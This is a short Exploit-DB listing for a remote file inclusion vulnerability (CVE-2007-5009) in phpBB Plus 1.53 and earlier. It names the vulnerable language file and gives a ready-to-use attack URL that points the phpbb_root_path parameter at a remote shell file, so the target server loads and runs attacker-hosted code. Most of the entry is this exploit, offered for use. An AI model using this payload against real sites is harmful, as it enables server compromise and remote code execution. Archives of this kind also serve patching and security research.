phpBB Plus <= 1.53 phpbb_root_path Remote File Inclusion Vuln

2007-09-20T00:00:00
ID EDB-ID:4434
Type exploitdb
Reporter Mehrad
Modified 2007-09-20T00:00:00

Description

phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln. CVE-2007-5009. Webapps exploit for php platform

                                        
                                            AUTHOR = Mehrad Ansari Targhi
E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang
_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

# milw0rm.com [2007-09-20]